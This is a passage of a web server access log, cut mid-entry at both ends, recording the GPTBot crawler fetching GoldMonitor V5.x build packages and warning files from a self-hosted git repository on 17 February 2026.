compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14079] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:17:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:17:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13767] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13828] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13852] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13859] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14083] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:17:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13851] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13791] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13797] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:17:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10904] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13471] [Gzip 6.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 